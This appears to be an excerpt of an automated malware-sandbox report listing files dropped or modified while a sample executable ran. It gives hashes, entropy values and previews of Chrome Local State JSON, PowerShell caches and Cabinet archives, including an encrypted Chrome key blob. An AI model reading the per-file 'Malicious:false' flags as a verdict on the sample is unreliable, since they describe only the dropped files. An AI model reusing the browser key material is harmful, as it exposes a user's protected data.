                                                                                                                                                                      SHA-512:47D1A67A16F5DC6D50556C5296E65918F0A2FCAD0E8CEE5795B100FE8CD89EAF5E1FD67691E8A57AF3677883A5D8F104723B1901D11845B286474C8AC56F6182
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":0}
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60974
                                                                                                                                                                      Entropy (8bit):6.069119665310262
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:kaI71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKlyU:m711NyBTOgd0HhmAnhqj3d
                                                                                                                                                                      MD5:C2C14FBDB264C9B8E187DB4EECA2A0FC
                                                                                                                                                                      SHA1:30B8FE40310971EC006712DAA5100E0D68E12DA7
                                                                                                                                                                      SHA-256:6C8B5980263D41963950F4523AC22326470A72117DAF784D5C3550E467C4FE61
                                                                                                                                                                      SHA-512:59DEA72B0A2F7504FB5E0034882B4BB26002992E6711359D7D0E4B5C37FCA2AAE1674DCFE2FA67ECC3D39E26C99E516984E2AD3B3626FD93A9022991434C3144
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245952488007586"},"policy":{"last_statistics_update"
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):60974
                                                                                                                                                                      Entropy (8bit):6.069118178275724
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:k+S71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKlyU:s711NyBTOgd0HhmAnhqj3d
                                                                                                                                                                      MD5:DF0ECCD1ECBB9C77F88D7A7E0A9C185B
                                                                                                                                                                      SHA1:B804CD843BBC2375EB603C16B2523E38282A8C9B
                                                                                                                                                                      SHA-256:7C790A8E1D388B0BD4F61CE69D188EA0E5DEA177BB3F81A0BD9C9EFA413A3DB3
                                                                                                                                                                      SHA-512:48723960B2869A8D1934921791D831C2714658BD5B3111C1F3360189C3A93A2541AF26A4EF14B19C27E4B287F4D68FB1040922CCC26AF45F46C7C0427A91F111
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245952488007586"},"policy":{"last_statistics_update"
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):60974
                                                                                                                                                                      Entropy (8bit):6.069119665310262
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:kaI71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKlyU:m711NyBTOgd0HhmAnhqj3d
                                                                                                                                                                      MD5:C2C14FBDB264C9B8E187DB4EECA2A0FC
                                                                                                                                                                      SHA1:30B8FE40310971EC006712DAA5100E0D68E12DA7
                                                                                                                                                                      SHA-256:6C8B5980263D41963950F4523AC22326470A72117DAF784D5C3550E467C4FE61
                                                                                                                                                                      SHA-512:59DEA72B0A2F7504FB5E0034882B4BB26002992E6711359D7D0E4B5C37FCA2AAE1674DCFE2FA67ECC3D39E26C99E516984E2AD3B3626FD93A9022991434C3144
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245952488007586"},"policy":{"last_statistics_update"
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60974
                                                                                                                                                                      Entropy (8bit):6.06910727618429
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:kHt71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKlyU:e711NyBTOgd0HhmAnhqj3d
                                                                                                                                                                      MD5:5D4CFF06DF5301D9DE084AE5FD828DCB
                                                                                                                                                                      SHA1:EC773330A96980CA04B841A81CA266164FCE6832
                                                                                                                                                                      SHA-256:D98EF84C1C3AE55C0D496A77D56C9157DFBAD642565BF18CA799E299F8919C84
                                                                                                                                                                      SHA-512:308F091E446C133ED69451A6057FDB72BDBDFA5F00C806F0120FABA752859BC716A9B16D89F1BAA90B6FC5A80B72EEA306148AC68AE9A28B32B343DAA8CF0CEF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245952488007586"},"policy":{"last_statistics_update"
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):60974
                                                                                                                                                                      Entropy (8bit):6.069123970743544
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:kaW71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKlyU:U711NyBTOgd0HhmAnhqj3d
                                                                                                                                                                      MD5:75CCAE9D25D66B2AE88E12959964CEB0
                                                                                                                                                                      SHA1:7060192FB0496A947295934137C27987ECB63DE2
                                                                                                                                                                      SHA-256:4FD8988A6F60EB5B9397048E4E17D0EAA234EE6C0868722C6790C95BE8349175
                                                                                                                                                                      SHA-512:14AE9D415111054EC642A6F8BB0D7154FBEEB99D2166579C730302ECB7AA8254DA9F58C66BB7CFEAC44436DDB0F48D6ABA736F5E4B5281B0075157513A92624F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245952488007586"},"policy":{"last_statistics_update"
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                      MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                      SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                      SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                      SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{}
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):120265
                                                                                                                                                                      Entropy (8bit):6.056649843575069
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:1zatS55TnNtTFS788k8oZ3711NyBTOgd0HhmAnhqj3k:1tHD3FS7V2LXNyTOpBmAh4k
                                                                                                                                                                      MD5:DB71645084A3F10D713ABF4D9F0CEB40
                                                                                                                                                                      SHA1:4DD85036271E4D6680EC1BA782F3816CF1A1FD17
                                                                                                                                                                      SHA-256:1B6E2C6D2215018746C92FA8AFAB7B37F063CA98EBE99B2D95A7DF4DF7E0030E
                                                                                                                                                                      SHA-512:E9AA55753E17D7F6F3AF708292740909F017639898C0C68A5804B8B765E6C094A08B1C806C645159884034C2BB3DE2B240AF993CA3E7E5FC16D3312CEAFDD9E2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.661304361129015e+12,"network":1.661271963e+12,"ticks":135100036.0,"uncertainty":7662404.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrP
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60974
                                                                                                                                                                      Entropy (8bit):6.0691057378496565
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:kjW71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKlyU:V711NyBTOgd0HhmAnhqj3d
                                                                                                                                                                      MD5:EFAB55AC7539EFED7D958EBCF0C4E612
                                                                                                                                                                      SHA1:FA31E3D52DE6F3ADBC5814B1BA142031B53B3A6D
                                                                                                                                                                      SHA-256:9E4F28D3E5052629E281D8D9A0C4E26699F26ED4F5A05BE7D559677F428B1CB5
                                                                                                                                                                      SHA-512:68E6A4A5D66C347212A83AB230F7E430FFF733A7F260F40D648D0FA848DC250C28E9BA3DE686395FEE3756D707922CCC8F9B3DC41C48C16B07FCF7BB1438328A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245952488007586"},"policy":{"last_statistics_update"
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):94796
                                                                                                                                                                      Entropy (8bit):3.7446185422761773
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:ud2OPpihlkvVagnwtsNlrGvpj36dbmHnCGmZrkX9ZWxcMMX6rYpUKCz99N6O3ntO:o2OH+5diluHsTnKnr+fKEHtDK
                                                                                                                                                                      MD5:CE1B52849D6EF6EC9E7BB43D6D57B5A4
                                                                                                                                                                      SHA1:DD23805FF3C876935B93DC17FF527846FD58D13F
                                                                                                                                                                      SHA-256:37A1EDF9BA5FB32E508CDEE9508945D86DBE9C79B43B393F37C919DA9F09C4F5
                                                                                                                                                                      SHA-512:C244CB3AC980138768193B390A4E06CA799291802E19AEE08284517EC7FB2D09731DCBD4EAF4CDDE24CE10D5CCC384327AEBE785BB1E00EA889CDE180403BCC7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:Hr..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....e8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60974
                                                                                                                                                                      Entropy (8bit):6.069118178275724
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:k+S71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKlyU:s711NyBTOgd0HhmAnhqj3d
                                                                                                                                                                      MD5:DF0ECCD1ECBB9C77F88D7A7E0A9C185B
                                                                                                                                                                      SHA1:B804CD843BBC2375EB603C16B2523E38282A8C9B
                                                                                                                                                                      SHA-256:7C790A8E1D388B0BD4F61CE69D188EA0E5DEA177BB3F81A0BD9C9EFA413A3DB3
                                                                                                                                                                      SHA-512:48723960B2869A8D1934921791D831C2714658BD5B3111C1F3360189C3A93A2541AF26A4EF14B19C27E4B287F4D68FB1040922CCC26AF45F46C7C0427A91F111
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245952488007586"},"policy":{"last_statistics_update"
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                      MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                      SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                      SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                      SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{}
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5829
                                                                                                                                                                      Entropy (8bit):4.8968676994158
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                                                                                                                      MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                                                                                                                      SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                                                                                                                      SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                                                                                                                      SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):17328
                                                                                                                                                                      Entropy (8bit):5.559900592268057
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:It9/f0NK2k0UENpSBKnijultztR7Y9gySJ3kR1/qYKy:Q2TlP4KiCltp9ycGjd
                                                                                                                                                                      MD5:8C68E37E916603262093A678E319806E
                                                                                                                                                                      SHA1:C86DF4C06BE1FED2518F2A6210BE86B96D345EF4
                                                                                                                                                                      SHA-256:1B6216E70DAA19B36A92F8330BF24D6EB7A692EEEA28388E1ADF8A1695C0FFF8
                                                                                                                                                                      SHA-512:BD5DA134835A4F9D0D6FF3E65E77549DFC7063BB39C7982D8C17D04CCC47F5D0EF98403DF6C23192BE082A33D39E8D726018F55E3AD1A8B50F109AB21CC60817
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:@...e.....................B.n.c.....7................@..........H...............<@.^.L."My...:)..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)m.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                                      Process:C:\Users\user\Desktop\q1wLT3xKiY.exe
                                                                                                                                                                      File Type:Microsoft Cabinet archive data, 36 bytes
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):36
                                                                                                                                                                      Entropy (8bit):1.3753156176197312
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:wDl:wDl
                                                                                                                                                                      MD5:8708699D2C73BED30A0A08D80F96D6D7
                                                                                                                                                                      SHA1:684CB9D317146553E8C5269C8AFB1539565F4F78
                                                                                                                                                                      SHA-256:A32E0A83001D2C5D41649063217923DAC167809CAB50EC5784078E41C9EC0F0F
                                                                                                                                                                      SHA-512:38ECE3E441CC5D8E97781801D5B19BDEDE6065A0A50F7F87337039EDEEB4A22AD0348E9F5B5542B26236037DD35D0563F62D7F4C4F991C51020552CFAE03B264
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MSCF....$.......$...................
                                                                                                                                                                      Process:C:\Users\user\Desktop\q1wLT3xKiY.exe
                                                                                                                                                                      File Type:Microsoft Cabinet archive data, 2513220 bytes, 10 files
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2513220
                                                                                                                                                                      Entropy (8bit):7.991239343343546
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:49152:RNpJc7YrEa2u2h9swu+AU3Z9CcVL2wD+aRpXPaAt1DD4S6sdsWjIM:Lc8rHJ2jHxZYOTDrRxaAt1DES6osWsM
                                                                                                                                                                      MD5:0B970D1F500DBB861B12270421B6D06D
                                                                                                                                                                      SHA1:0CE2B4B05E1CDB1499EF1B9866C6F27B2F36A233
                                                                                                                                                                      SHA-256:DA9452C7056D954FEB1ABA8678518E8BD75C4EE3069B59EF5CC7940C4B89F6F0
                                                                                                                                                                      SHA-512:99651501B002105ED40A16383905D170B15AF68370B7F125152ADAE85F2C0C779A5F547C07B43DA46198F862C701ABE2EDABB0DAF969640E04674359C9372AF1
                                                                                                                                                                      Malicious:false
